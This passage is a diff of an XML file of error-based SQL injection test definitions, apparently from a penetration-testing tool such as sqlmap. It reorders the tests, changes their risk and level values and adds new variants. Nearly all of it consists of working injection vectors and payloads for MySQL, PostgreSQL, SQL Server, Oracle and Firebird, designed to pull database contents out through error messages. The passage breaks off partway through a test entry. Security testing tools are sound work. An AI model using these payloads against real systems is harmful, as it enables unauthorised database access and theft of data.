         <vector>AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector>
@@ -121,11 +287,30 @@
         </details>
     </test>
 
+    <test>
+        <title>PostgreSQL OR error-based - WHERE or HAVING clause</title>
+        <stype>2</stype>
+        <level>1</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector>
+        <request>
+            <payload>OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
     <test>
         <title>Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause</title>
         <stype>2</stype>
         <level>1</level>
-        <risk>0</risk>
+        <risk>1</risk>
         <clause>1</clause>
         <where>1</where>
         <vector>AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
@@ -142,248 +327,11 @@
         </details>
     </test>
 
-    <test>
-        <title>Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)</title>
-        <stype>2</stype>
-        <level>2</level>
-        <risk>0</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
-        <request>
-            <payload>AND [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle AND error-based - WHERE or HAVING clause (XMLType)</title>
-        <stype>2</stype>
-        <level>1</level>
-        <risk>0</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
-        <request>
-            <payload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)</title>
-        <stype>2</stype>
-        <level>2</level>
-        <risk>0</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
-        <request>
-            <payload>AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-            <dbms_version>&gt;= 8.1.6</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)</title>
-        <stype>2</stype>
-        <level>3</level>
-        <risk>0</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
-        <request>
-            <payload>AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Firebird AND error-based - WHERE or HAVING clause</title>
-        <stype>2</stype>
-        <level>2</level>
-        <risk>0</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
-        <request>
-            <payload>AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Firebird</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 5.0 OR error-based - WHERE or HAVING clause</title>
-        <stype>2</stype>
-        <level>2</level>
-        <risk>2</risk>
-        <clause>1</clause>
-        <where>2</where>
-        <vector>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
-        <request>
-            <payload>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)</title>
-        <stype>2</stype>
-        <level>3</level>
-        <risk>2</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
-        <request>
-            <payload>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.1</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)</title>
-        <stype>2</stype>
-        <level>4</level>
-        <risk>2</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
-        <request>
-            <payload>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.1</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)</title>
-        <stype>2</stype>
-        <level>5</level>
-        <risk>2</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
-        <request>
-            <payload>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.5</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 4.1 OR error-based - WHERE or HAVING clause</title>
-        <stype>2</stype>
-        <level>2</level>
-        <risk>2</risk>
-        <clause>1</clause>
-        <where>2</where>
-        <vector>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>
-        <request>
-            <payload>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 4.1</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL OR error-based - WHERE or HAVING clause</title>
-        <stype>2</stype>
-        <level>3</level>
-        <risk>2</risk>
-        <clause>1</clause>
-        <where>2</where>
-        <vector>OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</vector>
-        <request>
-            <payload>OR 1 GROUP BY CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</payload>
-            <comment>#</comment>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>PostgreSQL OR error-based - WHERE or HAVING clause</title>
-        <stype>2</stype>
-        <level>2</level>
-        <risk>2</risk>
-        <clause>1</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector>
-        <request>
-            <payload>OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-        </details>
-    </test>
-
     <test>
         <title>Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause</title>
         <stype>2</stype>
-        <level>2</level>
-        <risk>2</risk>
+        <level>1</level>
+        <risk>3</risk>
         <clause>1</clause>
         <where>2</where>
         <vector>OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
@@ -400,11 +348,32 @@
         </details>
     </test>
 
+    <test>
+        <title>Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)</title>
+        <stype>2</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
+        <request>
+            <payload>AND [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
     <test>
         <title>Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)</title>
         <stype>2</stype>
-        <level>3</level>
-        <risk>2</risk>
+        <level>2</level>
+        <risk>3</risk>
         <clause>1</clause>
         <where>2</where>
         <vector>OR [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
@@ -421,11 +390,30 @@
         </details>
     </test>
 
+    <test>
+        <title>Oracle AND error-based - WHERE or HAVING clause (XMLType)</title>
+        <stype>2</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
     <test>
         <title>Oracle OR error-based - WHERE or HAVING clause (XMLType)</title>
         <stype>2</stype>
-        <level>2</level>
-        <risk>2</risk>
+        <level>1</level>
+        <risk>3</risk>
         <clause>1</clause>
         <where>2</where>
         <vector>OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
@@ -440,11 +428,31 @@
         </details>
     </test>
 
+    <test>
+        <title>Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)</title>
+        <stype>2</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+            <dbms_version>&gt;= 8.1.6</dbms_version>
+        </details>
+    </test>
+
     <test>
         <title>Oracle OR error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)</title>
         <stype>2</stype>
-        <level>3</level>
-        <risk>2</risk>
+        <level>2</level>
+        <risk>3</risk>
         <clause>1</clause>
         <where>2</where>
         <vector>OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
@@ -460,11 +468,30 @@
         </details>
     </test>
 
+    <test>
+        <title>Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)</title>
+        <stype>2</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
     <test>
         <title>Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)</title>
         <stype>2</stype>
-        <level>4</level>
-        <risk>2</risk>
+        <level>3</level>
+        <risk>3</risk>
         <clause>1</clause>
         <where>2</where>
         <vector>OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
@@ -479,11 +506,30 @@
         </details>
     </test>
 
+    <test>
+        <title>Firebird AND error-based - WHERE or HAVING clause</title>
+        <stype>2</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Firebird</dbms>
+        </details>
+    </test>
+
     <test>
         <title>Firebird OR error-based - WHERE or HAVING clause</title>
         <stype>2</stype>
         <level>3</level>
-        <risk>2</risk>
+        <risk>3</risk>
         <clause>1</clause>
         <where>2</where>
         <vector>OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
@@ -501,14 +547,14 @@
          TODO: if possible, add payload for SQLite, Microsoft Access,
          and SAP MaxDB - no known techniques at this time
     -->
-    <!-- End of error-based tests - WHERE or HAVING clause -->
+    <!-- End of error-based tests - WHERE, HAVING, ORDER BY or GROUP BY clause -->
 
-    <!-- Error-based tests - After ORDER BY...LIMIT... -->
+    <!-- Error-based tests - LIMIT clause -->
     <test>
         <title>MySQL &gt;= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)</title>
         <stype>2</stype>
         <level>2</level>
-        <risk>0</risk>
+        <risk>1</risk>
         <clause>1,2,3,4,5</clause>
         <where>1</where>
         <vector>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')),1)</vector>
@@ -523,19 +569,23 @@
             <dbms_version>&gt;= 5.1</dbms_version>
         </details>
     </test>
-    <!-- End of error-based tests - After ORDER BY...LIMIT... -->
+    <!-- End of error-based tests - LIMIT clause -->
 
     <!-- Error-based tests - Parameter replace -->
     <test>
         <title>MySQL &gt;= 5.0 error-based - Parameter replace</title>
         <stype>2</stype>
-        <level>3</level>
-        <risk>0</risk>
+        <level>1</level>
+        <risk>1</risk>
         <clause>1,2,3</clause>
         <where>3</where>
         <vector>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
         <request>
+            <!-- These work as good as ELT(), but are longer
             <payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
+            <payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
+            -->
+            <payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
         </request>
         <response>
             <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -550,12 +600,16 @@
         <title>MySQL &gt;= 5.1 error-based - Parameter replace (EXTRACTVALUE)</title>
         <stype>2</stype>
         <level>3</level>
-        <risk>0</risk>
+        <risk>1</risk>
         <clause>1,2,3</clause>
         <where>3</where>
         <vector>(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')))</vector>
         <request>
+            <!-- These work as good as ELT(), but are longer
             <payload>(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')))</payload>
+            <payload>(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')))</payload>
+            -->
+            <payload>(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')))</payload>
         </request>
         <response>
             <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -570,12 +624,16 @@
         <title>MySQL &gt;= 5.1 error-based - Parameter replace (UPDATEXML)</title>
         <stype>2</stype>
         <level>4</level>
-        <risk>0</risk>
+        <risk>1</risk>
         <clause>1,2,3</clause>
         <where>3</where>
         <vector>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]))</vector>
         <request>
+            <!-- These work as good as ELT(), but are longer
             <payload>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1]))</payload>
+            <payload>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1]))</payload>
+            -->
+            <payload>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1]))</payload>
         </request>
         <response>
             <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -590,12 +648,16 @@
         <title>MySQL &gt;= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)</title>
         <stype>2</stype>
         <level>5</level>
-        <risk>0</risk>
+        <risk>1</risk>
         <clause>1,2,3</clause>
         <where>3</where>
         <vector>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
         <request>
+            <!-- These work as good as ELT(), but are longer
             <payload>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
+            <payload>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
+            -->
+            <payload>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
         </request>
         <response>
             <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -609,8 +671,8 @@
     <test>
         <title>PostgreSQL error-based - Parameter replace</title>
         <stype>2</stype>
-        <level>3</level>
-        <risk>0</risk>
+        <level>2</level>
+        <risk>1</risk>
         <clause>1,2,3</clause>
         <where>3</where>
         <vector>(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
@@ -625,11 +687,30 @@
         </details>
     </test>
 
+    <test>
+        <title>PostgreSQL error-based - Parameter replace (GENERATE_SERIES)</title>
+        <stype>2</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
+        <request>
+            <payload>(CAST('[DELIMITER_START]'||(SELECT 1 FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
     <test>
         <title>Microsoft SQL Server/Sybase error-based - Parameter replace</title>
         <stype>2</stype>
         <level>3</level>
-        <risk>0</risk>
+        <risk>1</risk>
         <clause>1,3</clause>
         <where>3</where>
         <vector>(CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')))</vector>
@@ -650,7 +731,7 @@
         <title>Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)</title>
         <stype>2</stype>
         <level>4</level>
-        <risk>0</risk>
+        <risk>1</risk>
         <clause>1,3</clause>
         <where>3</where>
         <vector>(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')</vector>
@@ -671,7 +752,7 @@
         <title>Oracle error-based - Parameter replace</title>
         <stype>2</stype>
         <level>3</level>
-        <risk>0</risk>
+        <risk>1</risk>
         <clause>1,3</clause>
         <where>3</where>
         <vector>(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
@@ -690,7 +771,7 @@
         <title>Firebird error-based - Parameter replace</title>
         <stype>2</stype>
         <level>4</level>
-        <risk>0</risk>
+        <risk>1</risk>
         <clause>1,3</clause>
         <where>3</where>
         <vector>(SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'))</vector>
@@ -706,18 +787,21 @@
     </test>
     <!-- End of error-based tests - Parameter replace -->
 
-
-    <!-- Error-based tests - GROUP BY and ORDER BY clauses -->
+    <!-- Error-based tests - ORDER BY, GROUP BY clause -->
     <test>
-        <title>MySQL &gt;= 5.0 error-based - GROUP BY and ORDER BY clauses</title>
+        <title>MySQL &gt;= 5.0 error-based - ORDER BY, GROUP BY clause</title>
         <stype>2</stype>
         <level>3</level>
-        <risk>0</risk>
+        <risk>1</risk>
         <clause>2,3</clause>
         <where>1</where>
-        <vector>,(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
+        <vector>,(SELECT 1 FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
         <request>
